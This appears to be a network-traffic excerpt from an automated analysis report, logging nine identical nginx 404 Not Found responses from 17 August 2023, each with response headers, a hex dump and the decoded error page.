                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:47 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:49 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:54 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:56 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:59 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:01 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:06 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:08 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:10 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
